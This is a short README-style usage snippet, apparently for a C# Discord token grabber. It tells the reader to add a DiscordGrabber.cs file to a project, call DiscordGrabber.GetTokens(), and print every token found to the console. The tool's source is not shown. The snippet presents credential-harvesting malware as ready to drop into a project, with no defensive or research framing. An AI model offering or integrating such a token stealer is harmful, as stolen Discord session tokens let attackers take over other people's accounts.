October 12, 2022 at 1:44 AM
## Usage
Just add the DiscordGrabber.cs file in your Project and call:
DiscordGrabber.GetTokens();### Example
This will output all found tokens in a console window:
foreach (string token in DiscordGrabber.GetTokens()) Console.WriteLine(token);

